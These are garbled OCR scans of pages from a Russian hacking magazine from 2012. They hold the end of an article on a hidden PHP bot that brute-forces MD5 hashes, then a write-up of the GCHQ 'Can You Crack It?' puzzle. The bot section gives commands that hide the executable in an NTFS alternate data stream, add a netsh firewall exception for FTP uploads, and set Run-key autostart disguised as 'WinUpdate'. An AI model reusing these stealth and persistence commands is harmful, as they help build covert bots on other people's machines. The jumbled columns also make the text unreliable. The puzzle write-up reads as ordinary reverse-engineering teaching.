вращать исключительно уникальные словари, чтобы у каждой

if (!file_exists( './vocabulary.txt' ))

машины был свой <<с ловарный запас>>. Также стои т оставить возможно сть менять словарь с помощью команды, отправляемой

iпstallVocab();

чере з мастер-сервер . Теперь же нам необходимо накадит ь самую

} startScheduler();

главную функцию- функцию шедулера, выполняющую также команды мастер-сервера. Объем статьи не позволяет привести

компилим

здесь код этой функции полностью, поэтому укажу лишь ее кейсы

!полный код ищи на нашем диске):

Теперь, когда мы объединили всё это в один файл, перед нами

Ьгutе-брут;

встает задача создать из него полноценный ехе. В этом нам по­

сlеап- очистка данных , полученны х в результате предыдущих

может небольшая тулза с длинным названием

брутфорсов;

Compileг/Embeddeг.

iпstаll-установка;

Bamba lam

РНР ЕХЕ

Она представляет собой билдер, который создает ехе из РНР­

фай ла. Билдер за всё время его использования ни разу не подво­

ехit-выход.

дил, работал отлично, без всяки х ба го в !респект авторам!). Этот билдер позволяет компи лить экзешники как для РНР

По дефолту шедулер находи тс я в режиме ожидания команд . В качестве тайм-аута мы указали

300

4.0, так

и для

более новых версий интерпретатора. В простейшем случае компи­

секунд. Это временной

интервал обращения б ото в к нашему серверу. Далее идет запуск

ляция в

Bambalam

выглядит вот так:

команд с учетом данных , переданных сервером боту, причем по­

сле выполнения команды мы делаем пау зу lв некоторых случаях)

bamcompile

[-optioпs]

iпfile.php

[outfile . exe]

ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ ЯЗЫКОВ ПРОГРАММИРОВАНИЯ

1

РНР

bl

DeveiStudio

M<~miS4r

Однозначный лидер

2

Php2exe tmJylyi'{4Y_R

3

Bambalam Embedder Ьit.ly/wpSпiZ .

'

ру2ехе

Ьit.ly/3~

lilli..Y!:

5

Peri2Exe Ьit.ly/y29qШ

Преобразует исходный

Более мощный инструмент,

Позволяет компилировать

по конвертированию РНР­

код на РНР в исnолняемый

не имеющий

скрипты,написанные

перевода перловки вехе .

скриптоввполноценные

файл. Чтобысозданное

интерфейса и позволяющий

на Питоне, в экзешники.

Создает независимый исполняемый файл ,

GUI-

Отличный инструмент для

nрограммы . Тут

nриложемне могло

па ковать прямо в консоли .

Помимо исполняемого

и визуальная среда

запуститься, в той же

Также комnилирует целые

файла, создаетнесколько

который работает в любых

программирования,

директории должна

проекты с исnользованием

библиотек, помогающих

системах и не требует

и отладка кода,

иметься библиотека

различных библиотек,

готовой программе

интерпретатора .

и подключение различных

php5ts.dll.

наnример

заnуститься .

cURL.

модулей и многое другое .

ХАКЕР

03/158/2012


РНР-бот для

Windows

Сервис cmdS.ru предлагает Вам средства проверки стойкости различных видов хеш-кодов (SНAl, З2 b1t MDS, MD4, mysql и т .д.). Наша компания занимается вопросами компьютерной безопасности с 2006 года. База данных самая большая в мире

и на сегодняшний день содержит около

4,800,000,000,000 записей, 95% 50 Терабайт•

данных распределен по кластеру и составляет

Пожалуйста Зарегистрируйтесь или Автошчуйтесь

.

-

....

из которых уникальны. Суммарный объем

. . -;. ·-f.,~ Сервис на базе распределенных вычислений для расшифровки МD5-хешей

Итак, бот готов. Теперь займемся сервером. Во-первых, нужно зафиксировать в базе те боты, которые успешно отстучали нам

проходит по всем файлам в папке гesults, поочередно открывает их и добавляет в базу.

х отя бы один раз, то есть, так сказать, установленные боты. Для

этого выполняется проверка IР-адресов в базе [можно присвоить специальный идентификатор каждой машине, который она будет

ХАКЕРСКИЕ ФИЧИ Теперь перейдем к оптимизации нашего самопального комплекса .

передавать каждый раз, чтобы различить между собой ха сты,

Во-первых , брутер, бот и библиотеку можно запаковать в один

находящиеся за NAT), после чего в базу добавляются те адреса,

экзешник, причем так, что процесс функционирования бота станет

которые не были в ней найдены. Их можно выводить в панели

невидимым, то есть консоли не будет видно.

управления ботами. Но на тот случай, если бот уже брутит и немо­

Для этого можно nрибегнуть к подручным средствам, а именно

жет отстучать, что он живой, можно также сделать в таблице

со с тавить батник следующего содержания:

столбец

нужно с качать софтин к у ВАТ То ЕХЕ Conveгteг

lastcallback . Там

отображается число, которое указывает,

%CD%\bot.exe. Далее 1.5 и скомпилировать

когда бот отстучал в nоследний раз. Таким образом, при каждом

в ней этот батник, предварительно указав в настройках invisiЫe

обращении к серверу зто значение обновляется.

application и выбрав на вкладке include три файла: bot .exe, теку [php5ts.dll) и сам консольный брутер [md5.exe).

Если оно больше 300 [дефолтный пятиминутный интервал отстукивания бота), то это значит, что бот работает или находится

библио­

Программка создаст один файл, работающий в фоновом режи­

в офлайне. Затем нужно создать генератор конфигов. Конфиг, как

ме . Затем можно сделать так, чтобы скрывались и сами файлы . Для

ты, возможно, заметил по вышеприведенным кускам кода, состо­

этого есть несколько способов. Один из них- это, например, про­

ит из двух частей, объединенных знаком

1.

стое использование штатной виндавай софтины attгib с флагами

Первая часть отвечает за команду, которую nолучает бота,

'+h ' и '+s'. При мер:

а вторая- за дополнительные данные, нужные для исnолнения

этой команды. Чтобы дать команду на установку, мы должны

attrib "%CD%\bot.exe" +h +s

отправить что-то вроде iпstalllvocab_123123123.txt, где iпstall­ этo команда установки бота, а

vocab_123123123 .txt-

это файл

словаря, который надо установить. Мы также можем очистить все

Такая команда скроет и сделает системным наш файл бота. Спрятать файл в потоках

NTFS

немного сложнее:

рабочие файлы, просто удалив их,- для этого достаточно по­ слать команду

clean.

Ну и самая главная команда- это bгute.

Второй параметр этой команды объединяет хеш и для б рута

cd "%systemroot%\system32 type packed_bot.exe>calc.exe:bet.exe

с помощью двоеточия:

Запуск при этом осуществляется тоже с помощью батника: brute)c4ca4238aeb92382edccse9aбf75849b: c81e728d9d4c2fб3бfeб7f89cc14862c:eccbc87e4b5ce2fe28Зe8f

d9f2a7baf3 Все результаты заливаются на ПР-сервер, который находится там же, где и центр управления . Попадает всё это дело в папку

cd "%systemroot%\system32 start .\calc.exe:bet.exe Наш файл в том числе загружает результаты на FТР. Файервол

Windows

может на это ругаться , поэтому попробуем его обойти:

гesults. Для того чтобы добавить в базу готовые результаты, бот <<дер­

гает» скрипт с передачей параметра

iamfinished.

С криnт сервера

passthru( 'netsh firewall add allowedprogram %WINDIR%\ system32\ftp.exe TCPinfrastructure>nul 2>&1 ' ); Авторан для нашего ехе [если он лежит, например, в % systemгoot % ):

passthru( 'reg add HKLM\software\microsoft\windows\ currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 2>&1' ); ЗАКЛЮЧЕНИЕ В РНР предостаточно функций, предназначенных для создания нехи­ лого файлового менеджера или же простого системного помощника . Я надеюсь, что благодаря моей статье ты убедился не только в этом, но также и в том, что для автоматизации процесса суще­

ствует множество различных средств , которые при совместном

Рабочий бот

ХАКЕР

03/158/20 12

использовании могут сильно тебе помочь.::;:

065


plaintext lfi rst!a plaintext.su, http://www.plaintext.sul ·

can cra 8t' 1• РЕШЕНИЕ ЗАДАНИЙ ДЛЯ ХАК-КОНКУРСА, УЧРЕЖДЕННОГО

УПРАВЛЕНИЕМ

ПРАВИТЕЛЬСТВЕННОЙСВЯЗИ ВЕЛИКОБРИТАНИИ

Недавно Управление правительственной связи

Великобритании объявило небольшой

Н-конкурс, чтобы привлечь к себе внимание к а к к работодателю . Не уверен, что к ним кто­ то устроился на работу, но пройт и задания из

На нашем диске ты смож ешь найти видео с полным прохождением

конкурса « Сап

You

Cr ack lt?».

спортивного интереса наверняка захотели многие .

.PNG .......IHDR. .............j .-•... sRGB ......... pHYs ................. tiME. .. .. . 3-9.p ... )iТXtComment ..... QkJCQjiAAACR2PFtcCAбq2eaCBSR+BdmD/zNzLQC+td3tFQ4q x8044 7ТDeuZwSP+{)SsDEcYR.78J KLW=2 ...... IDATx ... yt .... лcwuW... So-.. ,....... L.. l!!> ... q .. 58.. 1.. a.7.,. НV.y.&.:. G.a ...... mMH.d ......\ .U... ?.n7-Ktuwi ... Gj.R. ..... g.} .. .. sн. д .... sн . д.... sн . д .... sн . д .... sн . д .... sн . д.... sн . д .... sн. д.... sн. д .. .

.sн . д.... sн . д. ... sн . д.... sн . д.... sн . д .... sн . д. ........o.. u.... в :. Lz . D .. I!!>.B c.... .l.4.. ) .... • -....... d .. !QZ. •-ее. D, .. ,.. q.R.fc.. & .•w41r... Ra6... 7...:... ".. } .D.r..../14.% ....... D<. D " s .i A.ТX, .. ZD .... $....... лX. .. 7.. ·.C.9y.i ...V... ,MO.. G.B y .... B .......... (<.C.. q .. X.Di .. 4M .....f{... Sv; .. (... 8.H.&'.}}y.j....... 1.. BQ.. !. .... zz.... t..jM&...... К. .. s% .... f .. nW.... X.fH .... s.. k .. h.vmm-' .._y: :.' p.6... djSK ............. R. .. R.. 4. Q.... >..... <....... bH ...... C.1 ... t) . .........-.UX,.%K11!> ..

Задани е первого этапа

066

Комментарий к файлу с заданием

ХАКЕР

03/158/2012


1

Итак, некоторое время назад Управление

адрес конца наш е го кода, указываю щи й, где

void

правительовенной связи Великобритании

со держит ся значе ни е ОхАААААААА. Д алее

{

об ъявило конкурс, успешное про хож д ение

из стека из влека ется

DWORO,

нивается с ОхАААААААА. Затем извлекается

свое резюме, а затем и устроиться на работу

е ще о дн о з начени е, ко тор ое срав нив ае т ся

в брита н скую киберразве д ку . Пр едложе нны е

с О х ВВВВВВВВ . Однако этого куска дан ных

за дания н е так уж сложны, д а и саму стра­

!второй половины стека функции] у нас нет.

ницу отдела к~дров Управления правитель­

функции , необ хо дим о сохранить кар тин ку с за­

сразу обнаружи ть при п омо щи пои сков и к а

дани е м с сай та и п осмо треть , как эта функция

Google,

однако этот конкурс всё же интере­

сен , так как он позволяет оценить у ровень

под г отовки сотрудников, ко т орые соста вля­ ли задания.

На странице ко нк урса, находящейся по

iTXt РNG-файла с за ­ данием ! ко диров ка UTF-8]. Бинарные д анные закодированы с п омо щью алгоритма Base64 и следуют за сло в ом Comment !смотри рисунок].

}

Раскодировав и склеив дв а бинарника, я за­

v1 v2 do

ния, который представляет собой следующую

ствующий рисунок] и надпись-дразнилку «Сап

строку:

Сгасk

lt?>>.

l~hile

поначалу подумал, что это за шифрованное по­

GET

/ 15b43бde1f9187f3778aad525e5d8b28 .js

ASCII,

однако у меня

ничего не вышло. В итоге я решил засунуть все

НЕХ-значения с рисунка в двоичный фай л и открыть полученное непотребство в

IDA

Рг о . В

После от п равки соот в е т ствующе г о

GET-

зanpoca н а сервер получаем второе за дан ие.

Кстати, ко д можно запус тить нескольки­ ми с п особами. Я создал простой ехе -фа йл, в котором сначала считывается кусок кода с

таты.

за да нием, а пот ом всё э т о д ело запускается на

распознал осмысленные куски

кода для архитектуры х86 . Я п о нял , ч т о выбрал

выполнение ! п од ко н тро л ем

правильный п у ть.

простой ассемблерной вставки:

IDA] при пом ощ и

OxDEADBEEFu; +

v1 ;

( (_BYTE ) vO ) ; sub_39 (); } Результат декомпиляции

нием. Д ля этого не нужно знать формат

PNG,

а достаточно просто быть внимательным !не­

Недолго думая , я преобразовал пол уче н­ ный кусок кода в функцию и запустил д еком­

=

l~hile

итоге мне удалось пол учить кое-какие рез ул ь­

IDA легко

( (_BYTE ) vO ); о;

}

НТТР / 1 . 1

мости каждого зна чения и попытался затем

перевести их в символы

1;

LOBYTE ( v1 ) = v2 + v4[ v0 ] v2 = ROR __ ( v2 , 8); v3 = v4[ v1 ]; v4 [ v1 ] = v4[ v0]; v4[ vO ] = vз ; lOBYTE ( vO ) = vO + 1;

Уви д е в эти Н ЕХ-значения, я

слание, начал было считать частоту встречае­

+

{

пустил код на выполнение !под отладчиком] и пр осмотрел рез ультат пр о ц е д уры дешифрова­

You

v4[ v0 ] = vO ; lOBYTE ( vO ) = vO

ус тро е на . Недостающие д анные со держатся в

с набором НЕ Х - з начений !смотри соответ­

о;

{

дополнительной секции

адресу caпyou cг ackit . co . uk , мы видим картинку

cdecl sub_O()

vo do

Чтобы найти вторую половин у стека нашей

овенной связи IGCHQJ можно пр акти ч ески

itl

int vo ; // есх@1 int v1 ; // еах@З unsigned int v2 ; // еdх@З char vз ; // bh@4 char v4[256] ; // [sp+Oh] [bp-100h]@2

который срав­

которого п оз воляло отправить в У правление

с ап сгасk

обходима я информация со держится в самом

начале файла].

_ asm

пилятор. Сначала в стеке вы деля ется место под массив в

256

байт, который заполняется

значениями от О до

255,

а дале е вып о лняется

проце д у ра преобразования массива, которая

int 3;

mov call

SECOND STEP

nрограммная точка останова

еах,

еах;

array; ar ray -

массив

с

кодом

заnус к к ода на выnол нение

попробовать написать эмулятор микро­ nроцессора . Дан кусок памяти с кодом и

на са мом д еле пре д с т авляет собой алгоритм

инициализации шифра RC4 с ра зме ром блока 8 бит и к люч ом OxD EADBEEF !смотри рисунок] .

Во втором задании а вт оры предлагают нам

данными, а также описана архитектура

Хочу отме т ить, что в начале кода прои схо ­

микропроцессора, для которого вс ё это

После всего этого вызывается еще одна функ­

дит jmp через четыре !вроде бы] неиспользуе­

предназначено . Процес сор состоит из

ция, стек которой испорчен, и поэтом у о н а не

мых байта. Э ти четыре байта пр иго дя тся нам в

по зубам декомпилятору.

дальн ейшем. Как видишь, первое задание до­

восьми регистров, четыре из которых !гО ... гЗ] представляют собой регистры общего на­

вольно про с тое. Затруднения возникли лишь

значения, два предназначены для хра нения

Как оказалось, в начале второй функ­ ции значение регистра

esp,

содержащего

указа тель на вершину стека, меняется на

при об нар уже нии второй части с тека функции

адреса сегме нта кода и а др еса сегмента

в дополнительной секции РNG -файла с зада-

данны х ics и ds соо тв е т ственно], о д ин ре-

printf ( ''\nkeygen .•xe\n\n'' ); if ( ~1 •• 2 ) (

uS • ( FILE • ) f ope n6 4("'license.txt" . ''r" );

if ( us ) ( MI?IIISet (&U9 0

D.

UNIX CRYPT()

2Jш);

fsc.:.nf ( uS . '"ts'' • r.u9 ); f c lose ( uS ); if ( u9 •• ' qhcg' )

Функция сгурt в операционных системах

{

u2 • crypt (); if ( ! s tr c ~tp ~ ( const char· • ) u2 . ghDTK7b8Kru w) ) U13 • 1;

printf ( "loading stage1 license key(s) .. . \n''); u6 • u10 ;

printf ( "loading stage2 license key( s ) . . . \n\n'' ); u7 • u11 ; u8 • u1 2 ; }

if ( U13 ) (

u4 • Tr ans•itl nfo (•(_DWORD

• )( а2

• lt). ( int )&u 6 );

}

else {

pri ntf ( ''er-ror: licf'nse.txt i nualid\n''); u4 • - 1;

*ni x

полученный блок шифрованного текста вновь

DES

служит для хеширования различных данных,

шифруется с помощью алгоритма

в том числе паралей пользователей системы.

Таким образом , блок из восьми нулевых байт

и т. д.

Традиционная реализация этой функции

шифруется в nроцессеработы

использует американский алгоритм

отметить, что сгурt не использует стандартную,

DES (Data

25

раз . Стоит

Encгyptioп Staпdaгd]. Пароль пользователя

эталонную реализацию алгоритма

сокращается до восьми символов, от каждого

Алгоритм каждый раз слегка меняется . Его

из которых, в свою очередь, берется

конкретная реализация зависит от соли длиной

7 бит. 7 бит формируют 56-битный DES, при помощи которого

DES.

Восемь наборов по

12

ключ алгоритма

nреобразуются в строку при помощи алгоритма

шифруется блок из восьми нулевых байт . Затем

бит. Соль и шифрованный текст в итоге

Base64.

Основной функционал программы keygen

ХАКЕР

03 / 158/ 2012

067


взлом

short loc_6

-------------; :=====-=-=-=-:..::;- ----------------------------·

-------------

dd OAЗBFC2AFh

-

1

-----------------------------------·

loc_6:

; sub xor

сэ:

ОхОО ,

dэ:

OxlO ,

fl :

ОхОО ,

j tirmware:

esp,

100h

есх,

есх

СООЕ

XREF: sub_O!j

[ Oxd2aьlf05 , OxdalЭfllO ] So you did it- поздравление с успешным

Неиспользованные значения из первого и второго заданий

гистр служит для хранения флага операции

[flgl, и один- для хранения адреса текущей инструкции [ipl. Микропроцессор обладает набором из

описании задания упоминается регистр cs, так же как и г51. Второй подводный камень -реализация fаг jump'oв и изменения ip.

выполнением заданий

GET /da75370fe15c4148bd4ceec861fbdaa5.exe НТТР/1.0

Здесь просто надо знать, что значения ре­

восьми инструкций, каждая из которых [за

гистров, отвечающих за номера сегментов,

Отсылая очередной GЕТ-запрос к сайту, полу­

исключением инструкции hlt, прекращаю­

изменяются только при дальних переходах и

чаем третье за дани е - исполняемый файл. При

щей выполнение программыl имеет два

не изменяются, если ip начинает указывать

просмотре зависимостей это го файла видно,

режима работы: mod О и mod 1. В принципе,

на новый сегмент кода . В остальном же всё

что для его работы необходим Cygwiп. Вообще,

для успешного выполнения задания до­

просто и ��розрачно. Разработчики заданий

в свойствах полученной программы указано,

статочно обладать небольшими навыками

предлагают нам реализовать эмулятор на

что настоящее имя зкзешника keygeп.exe, так

программирования, а также представлять,

языке JavaScгipt, однако на то, будет ли

что смело переименовываем его.

как рабо т ают микропроцессоры. Однако в

учтено выполненное задание, выбор языка

процессе программирования я наткнулся

программирования не влияет. Я реализо­

сом- код никак не обфусцирован. При за пу­

В этот раз опять никаких пр облем с ревер­

на несколько подводных камней. Сперва я

вал эмулятор процессара на С. Программа

ске keygeп требует передать ему URL сайта для

объединил в один массив регистры общего

выполняется довольно быстро, хотя у меня

соединения в качестве первого пара метра. Ал­

назначения, а для cs и ds выделил отдель­

были подозрения, что разработчики напи­

горитм работы программы достаточно прост: в

ные переменные. Как оказалось, зто оши­

шут код, который будет работать полчаса :-1 .

текущей дир ектории выполняе т ся пои ск файла

бочный подход, так как в коде встречаются

инструкции типа «add г[5], 12>>, которые, по

После остановки процессара [выполнения инструкции hltl в памяти появится ключ к

также три числа. Судя по строкам в се гменте

замыслу разработчиков задания, изменяют

третьему этапу конкурса - очередной GЕТ­

данных, требуемые числа представляют собой

значения сегментных регистров напрямую [в

запрос:

Stage оп е liceпce key и Stage two liceпce key,

licence .txt, из которого считывается строка, а

ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ В настоящее время сложно найти

<<заnо дозрить >> тот или иной участок кода в

коммуникационную систему, которая не

nринадлежности к какому-либо алгоритму .

ISBo x' ыl, некоторые специфические константы,

использовала бы криnтографию. Часто в

Так, например, современные симметричные

а также такие nараметры алгоритма, как длина

процессе реверс-инжиниринга различных

блочные алгоритмы шифрования обычно

ключей [в том числе длина массива раундовых

модулей необ х одимо распознавать

построеныпоитерационной схеме, в которой,

ключей!, длина блока, количество итераций

и восстанавливать используемые

как правило, производится замена значений в

[раундов! и т. д. Подобными признаками

криптографические алгоритмы, режимы их

соответствииснекоторой таблицей в памяти ,

также обладают и хеш -фун кции. Алгоритмы

работы, nорядок выработки и использования

нало жение ключа шифрования и линейное

хеширования обычно исnользуют большие

ключей шифрования и т. д. Разбор конкретной

преобразование . При этом в пределах одной

наборы констант, что облегчает распознавание

реализации алгоритма такженередко

функции в ассемблернам листинге может

типа алгоритма и его восстановление .

позволяет не только выявить ее ошибки, но

встретиться цикл, большое количество

Стоит отметить, что в подавляющем

и оnределить, что алгоритм исnользуется

инструкций тиnа

mov, movzx , add, хог, shl, shг

большинстве программных реализаций

неnравильно, в результате чего могут

и т. д ., а также частые обращения к nамяти [в

симметричных алгоритмов шифрования

возникать уязвимости, nозволяющие в

качестве nримера смотри рисунок!.

функция выработки массива раундовых ключей

конечном итоге nровести усnешную атаку на

Кроме того, для каждого криптографического

lkey schedulel и функция дешифрования/

систему в целом.

алгоритма можно выделить некоторые

шифрования открытого текста находятся в

Вообще, универсального рецеnта по

<< отличительные черты >> , которые позволяют

разных участках кода программы . Это помогает

распознаванию криптографических

автоматизировать поиск необ х одимых

ускорить nроцесс обработки информации (и

алгоритмов не существует, можно лишь

участков кода. Чаще всего такими признаками

не тратить каждый раз время и ресурсы на

выделить некоторые nодходы и оnисать

служат константы, х арактерные для того

nолучение

некоторые nризнаки , которые позволяют

или иного алгоритма. Для симметричных

алгоритма!.

068

алгоритмов это могут быть блоки подстановак

key shedule

из основного ключа

ХАКЕР

03/158/ 2012


1са п cra ck it l

Ито г о в ый GЕТ-за пр ос к се р ве р у и м еет

то есть это неко т о р ые д ан н ые, дл я n олучения

которых необходимо решить за д ачи , п ре д ла­

с л едую щ ий в и д :

АЛГОРИТМ

гаемые на первом и втором этапах конкурса.

Прочитанная из файла строка nреобразуется

при nомощи функции crypt [из Cygwin ) и срав­

RC4

GET / hqDT K 7 b8K2rvw/ A ЗBf C 2A F /D2 AB1F e5/ DA1 3F1 1e/key.txt НТ Т Р / 1. е Алгоритм

нивается с э т алон н ым з н а ч е н ием из сегмен т а

данных программы. Д ойдя д о э т ого эта n а, я

Этот запрос позволяет просмотреть файл

[также изве с тен как

ARC4)

на

уж было nриня-лся ломать хеш из сегмента

key.txt,

данных, однако э т о был тупиков ы й п уть, и в сё

с п оз д равлением

оказа л ось гораз д о n р о щ е. Н еобхо д имый IР ­

на оп исание вакансии, в ко т о р ом говори т ся,

Ривесто м , одним из основателей компании

адрес получается с использованием перво г о

что конкурсанту, успешно выполнившему все

R5A

nараметра программы [UR L сервера) и DNS.

за д ания, отнюдь не предлагают работу прямо

ладает рядо м до с тоинств , к которым в первую

Как несложно д ога д аться,

UR L д олжен

п ред­

в котором указан ключ от страни ц ы

RC4

сегодняшни й де н ь является одним из самых

<<So you did it» и ссы л кой

известных и широко используемы х поточных

шифров. Алгоритм был разработан Раном 5ecu гi ty, в далеком

1987

году .

RC4

об­

сейчас, н о согласны рассмотреть его канди­

очер е дь относят с я высокая скорость работы

став пят ь собой а др ес страницы с за да ни ями:

да т у р у п озже, когд а в У п равлении п оявятся

и п е ре м енная длина ключа . На каждом такте

canyouc г ackme . co.uk . Д алее

свободные вакансии.

keygen.exe форми­

работы алгорит м генерирует

рует к удаленному серверу G ЕТ- запрос вида:

SUMMARY GET /%s/%e8X/%e8X/%e8X/key .txt

НТТР / 1 .е

Как я уnоминал ранее, на месте строки в за­

8 бит

псевдослу ­

ча йн о й по с ледовательно с ти и изменяет с вое вн у треннее с остояние , к оторое определяется

З ад анияотУправления п равительствен -

перестанов к ой значений от О до

ной связи Великобритании не представля-

дву м я однобайт н ыми инде к сами:

255 [5) и i и j. Алго­

ют никак ой сложности и в первую очередь

рит м

просе стоит хеш-з н ачение из сегмента данных .

ориентированы на проверку смекалки, а уже

инициализаци и [К5А) и алгоритма выработки

Остае т ся лишь най т и значения <<ли ц ензионных

потом - навыков реверс-инжинирин г а и про­

псевдослуча й но й последовательности . Про­

ключеЙ>> п ервого и второ г о э т апов за д аний,

граммирования и знаний о принципах рабо т ы

цедура инициализации служит для выработ­

для чего я начал собирать данные, которые

микропроцессоров. Выполнить эти задания под

к и п е р е становки

на этих этапах не использовались. На первом

силу любому человеку, у которого достаточно

от

этапе это четыре байта в начале кода, через

терпения и энтузиазма. Это косвенно свиде­

псевдо к одом :

котор ы е ш ел п ер в о н ачал ь н ы й

тельс т вует о том, ч то в

jump. Дл я

40

RC4

до

состоит из дву х частей : процедуры

256

5

при помощи к люча длиной

бит. К5А описывается с ледующим

GC HQ работают обычные

второ г о этапа это нигде не пригодившееся два

люди ,

ОWОRО-значения firmware [смотри рисунок).

которые в зрелищных голливудских фильмах

Вообще, во втором задании не использовался

взламывают парали за пару минут и с легкостью

весь третий ба н к памяти, кото ры й на ч и н ае т ся

п ро н икают в за щ ищенные сети правите ль с т а

j

с сигна т уры

разных стран. Н апоследок хочется побла г о­

f or i f r om е t o 255 j := (j + S[ i ] + key[i mod keylength] ) mod 256 swap va lu es of S[i] and S[j] _ endfor

7z,

о дн ако не я вл яе т ся о д ноимен­

everyday heroes, а

не те супермены,

ным архивом. Этот учас т ок, не потребовавший­

дарить британцев за еще одну возмож н ость

ся для выполнения задания, видимо , нужен

<<размяться» и проверить свои знания . За д ания

прос т о д ля того, ч т